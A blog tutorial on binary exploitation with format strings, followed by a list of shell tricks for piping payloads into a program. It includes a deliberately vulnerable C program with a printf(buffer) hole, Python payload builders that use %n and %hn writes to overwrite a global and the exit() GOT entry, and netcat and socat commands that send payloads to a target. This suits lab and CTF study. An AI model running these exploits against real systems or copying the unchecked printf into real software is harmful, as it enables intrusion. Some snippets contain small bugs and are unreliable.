Home

Published

- 10 min read

Binary Exploitation - Format Strings

img of Binary Exploitation - Format Strings

Format Strings

There are days in Hacking when things don’t work as expected - such happened to our latest topic. Instead, we’ll have a look at a more historic topic: Format String Exploits.

The second half of the article is a quick reminder, you can execute stuff in bash in more than one way.

Overview

https://cs155.stanford.edu/papers/formatstring-1.2.pdf

  • fprintf - prints to a FILE stream
  • printf - prints to stdout
  • sprintf - prints to a string
  • snprintf - prints to a string with length checking
  • setproctitle - set argv[]
  • syslog - output to syslog

They all have in common that we can use format strings - the format string(s) will be inside the first argument, the content they represent are in the second argument: char *buffer; printf('Test: %p', buffer)

  • %s - string
  • %p - pointer
  • %d - decimal
  • %x - hexadecimal
  • %u - unsigned decimal
  • %n - number of bytes written so far

If we provide more format strings than variables, we can observe the following behaviour:

c

   int a = 10;
int *b;
char *c = "mystring";
printf('%x %x %x %x  \n', a, b, c)
// Output:
// a, 804871, 80484d0, 1

Check the stack and notice: The first address is the return address and the second one points to our formating string.

gdb

   $ x/6wx $esp
0xbfffef7c:     0x0804843d      0x080484d8      0x0000000a      0x08048471
0xbfffef8c:     0x080484d0      0x00000001
$ x/s 0x080484d8
0x080484d8:     '%x %x %x %x  \n'

The remaining four items are the same hex values that were printed by the format strings. As the user is responsible for supplying the proper amount of args, there’s no segfault or error. As every other function, during the call all args are being pushed to the stack. First the formatting, then the args to be formated.

Missing variables are assumed to be items down the stack.

Example 2:

c

   int a = 10;
int *b;
char *c = "mystring";
printf('%08p %08p %08p %08p  \n', a, b, c)
// Output:
// 0x0000000a, 0x08048471 ,0x080484d0, 0x00000001,  0x0000000a, 0x080484d0

Chars that break puts, gets, scanf, printf

puts, gets and printf will break on nullbyte. scanf however will not, but only on 0xA-0xE and 0x20

Exploiting format strings

vuln.c

c

   #include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void win()
{
    char *flag = "You won. Here's your flag MFOX{I_Kn0w_Form4t_Str1ngs}"
    printf(flag);
    _exit(1);
}

void vuln() 
{
    char buffer[512];
    fgets(buffer, sizeof(buffer), stdin);
    printf(buffer);
    exit(1);
}

int main(int argc, char **argv)
{
    vuln();
}

Let’s alter the execution flow to get to the win() function.

  • vuln() takes user input from stdin into a 512 byte sized buffer
  • That buffer then is passed as argument to printf
  • If we provide user input like %x %x %x the function will print contents of the stack
  • What we didn’t know yet: printf can also write to memory

To exploit, start simple:

python

   buff  = ""
buff += "AAAA"
buff += " %p" * 10

print(buff)

As expected, we get random items from the stack. But could we also get the four A’s we put in earlier?

Direct Parameter Access

http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  • Direct Parameter Access os a special format string layout. We can write %3$p to get the third value formatted as the pointer.
  • So when we input AAAA %4$p we might get the output AAAA 0x41414141
  • Unfortunately we cannot use AAAA %4$s to get the string representation instead of hex, the app will just segfault

The reason for this is: Some format strings need a pass by reference, some need a pass by value
In c, pass-by-reference means a pointer to the argument.

  • %s wants pass-by-reference, which we can’t supply - or can we?
    Sure enough, 0x41414141 likely isn’t a valid pointer address. But we can input whatever we want instead of AAAA
  • %n wants pass-by-reference - and it allows writing bytes to memory instead of reading.
    But: It needs the format (int*)&address, that means a pointer to a valid memory location where the output of %n can be written to
  • %p wants pass-by-value - it will print directly the values on the stack
  • %d wants pass-by-value
  • %u wants pass-by-value
  • %x wants pass-by-value

Use %n to change the value of a variable

In the vuln.c app above, we created an int target as global var. If we provide the address of target to %n we can change it’s value.

gdb

   $ p &target
$1 = (<data variable, no debug info> *) 0x804a048 <target>

To exploit it, we need to provide proper endianess.

python
   import struct
target_addr = 0x804a048
buff  = ""
buff += struct.pack("<I", target_addr)
buff += " %p" * 3                       # Our input is reflected back to printf as
                                        # 4th position on the stack
buff += "A" * 0x41                      # As %n writes "the number of bytes written"
buff += "%n"                            # we try that way to write 0x41 to "target"
print(buff)

But if we check in GDB, the value is 0x64. We need to adapt the exploit:

python
   import struct
target_addr = 0x804a048
buff  = ""
buff += struct.pack("<I", target_addr)                
buff += "A" * (0x41 - len(buf))
buff += "%4$n"                            
print(buff)

Back in GDB p target we finally get 0x41 - and are close to the “write-what-where” condition. Yet, writing a memory address like 0x8040000 would require a few hundred million of “A”s. This likely will kill everything else, including the terminal. :D

%n short writes

Using the format %hn we can write 2 bytes (multiple times) and overwrite the two most significant bytes with a 2-byte int. So, if we want to write: 0x41414141 to address 0x08040102
we need to

  • write 0x4141 to 0x8040102
  • write 0x4141 to 0x8040104

This is getting complicated, that why another example, where we want to write 0x41424344.

Due to the stack, we need to first write 0x4344 and then 0x4142.

python

   import struct
target_addr = 0x804a048
target_addr_high = 0x804a048 + 2

buff  = ""
buff += struct.pack("<I", target_addr)       
buff += struct.pack("<I", target_addr_high)          

count = 0x4344-len(buff)

buff += "%" + str(count) + "p"    # %123p for example
buff += "%4$hn"                   # Direct Parameter Access, writing the value to 
                                  # 2 bytes, to the location pointed to by the 4th 
                                  # parameter on the stack

# count = 0x4142 - 0x4344         # intuitively we would try this but we already
                                  # printed a lot of stuff we need to take into 
                                  # account for the actual length - this would 
                                  # result in target = 0x45464344
                                  # In short: we can't go lower than the first 
                                  # number.

count = 0x14142 - 0x4344          # Using a trick: Making it a 3-byte value by 
                                  # adding 1 on the left

buff += "%" + str(count) + "p"    
buff += "%4$hn"                                
                     
print buff

Result: target = 0x41424344

To actually make something useful out of it, we could:

  • Overwrite the return address with the address of the win() function (w/o ADLR)
  • We could place shellcode in the environment variables (those are on the stack, too!) and then use this address (w/o ADLR)
  • Overwrite the GOT address of another function, e.g. exit(), with the address of win()
  • Overwrite dynamic sections like .dtors https://www.win.tue.nl/~aeb/linux/hh/formats-teso.html
python
   import struct
win_addr = 0x80484eb              # look up all addresses in GDB or objdump 
                                  # of course only works without ASLR - if it's
                                  # on we could try a bruteforce approach

exit_GOT_addr = 0x804a01c
exit_GOT_addr_high = 0x804a01c + 2

buff  = ""
buff += struct.pack("<I", exit_GOT_addr_high)     
buff += struct.pack("<I", exit_GOT_addr)       

count = 0x804 - len(buff)

buff += "%" + str(count) + "p"    
buff += "%4$hn"                   # first we write the high bytes

count = 0x84eb - 0x804            # then the low bytes - if your calculation is off
                                  # maybe go trial-and-error with GDB and adjust
                       
buff += "%" + str(count) + "p"    
buff += "%5$hn"                   # same thing for the `5` here, seems 
                                  # to be not 100% scientific what to use when
                     
print buff

http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
https://medium.com/@airman604/protostar-format-4-walkthrough-b8f73f414e59

Reminder: cat trick

If we manage to execute a shell, e.g. because it’s already in the win() function, but we don’t have stdin connected, we can use cat instead to keep it open and to redirect stdin:

bash
   $ (cat exploit.bin; cat) | ./vuln_app`  

As we learned in pwn.college, there are at least a dozend more ways to accomplish the same thing, and usually one works.

It’s impossible to show over 1000 challenges and what we learned from the greatest course in history, in a few lines. We just tried to compile a bread and butter list, it makes sense in certain situations, surely not in all.

Utilizing FIFO for Input Redirection

Create a FIFO to send input to your application, emulating interactive stdin behavior in a scriptable manner.

bash
   $ mkfifo myfifo; cat exploit.bin > myfifo & ./vuln_app < myfifo

Leveraging tee for Output Inspection

Use tee alongside cat to inspect the payload being sent to the application, useful for debugging complex inputs.

bash
   $ (cat exploit.bin; cat) | tee debug_output.bin | ./vuln_app

Employing socat for Advanced I/O Redirection

socat can be used to create more complex bidirectional pipes, perfect for when you need to interact with network services.

bash
   $ socat EXEC:'./vuln_app',pty STDIN

Using tail -f for Persistent Input

Similar to cat, tail -f can be used to keep a session open indefinitely, especially useful for log file manipulation.

bash
   $ (tail -f /dev/null; cat) | ./vuln_app

Redirecting with echo and cat

Combine echo with cat for situations where initial setup commands are followed by a need for persistent stdin.

bash
   $ (echo "initial command"; cat) | ./vuln_app

Combining cat with nc for Network Interaction

When dealing with network sockets, nc (netcat) combined with cat can be used to interact with remote services.

bash
   $ cat exploit.bin | nc target.com 1234

Scripting Interaction with Python

Python’s subprocess module can script interaction with processes, offering a programmable alternative to cat.

python
   import subprocess
process = subprocess.Popen(['./vuln_app'], stdin=subprocess.PIPE)
process.communicate(input=b'exploit data\n')

Redirecting input with Python for more control

Python can be used for more complex input redirection scenarios, especially when you need to process data before sending it.

   import subprocess
with open('exploit.bin', 'rb') as f:
    subprocess.run(['./vuln_app'], stdin=f)

Executing with bash for dynamic command execution

Use bash -c to dynamically construct and execute commands, leveraging exec’s ability to replace the shell with a command or application.

bash

   $ bash -c 'exec ./vuln_app < <(cat exploit.bin)'

Piping into exec for inline execution

Incorporate pipes with exec to execute commands and manage input/output streams directly within the same shell process.

bash

   $ cat exploit.bin | exec ./vuln_app

Using exec with file descriptors

Manipulate file descriptors directly with exec to redirect them before executing a command, providing precise control over where data is sent and received.

bash

   $ exec 3< exploit.bin; exec ./vuln_app <&3

Exec and tee for live feedback

Combine exec with tee to execute a command while also duplicating its input to the terminal, allowing for live monitoring of sent payloads.

bash

   $ exec > >(tee /dev/tty) 2>&1; cat exploit.bin | ./vuln_app

Using cat with FIFO for input redirection

Redirect stdin through a FIFO pipe to simulate live input or feed data progressively.

bash

   $ mkfifo mypipe
$ cat exploit.bin > mypipe & ./vuln_app < mypipe

Using expect for interactive applications

expect is a tool for automating interactive applications by simulating a tty.

bash

   $ expect -c 'spawn ./vuln_app; send -- "$(cat exploit.bin)\r"; interact'

Sending signals with kill and trap

Combine cat with kill to send signals based on content read, useful for triggering actions in a program.

bash

   $ cat signal_trigger.txt | while read line; do kill -"$line" $(pidof vuln_app); done

Combining echo and redirection for simple payloads

For smaller, simpler payloads, echo combined with shell redirection can be effective.

bash

   $ echo -e "GET / HTTP/1.1\r\n\r\n" > /dev/tcp/localhost/80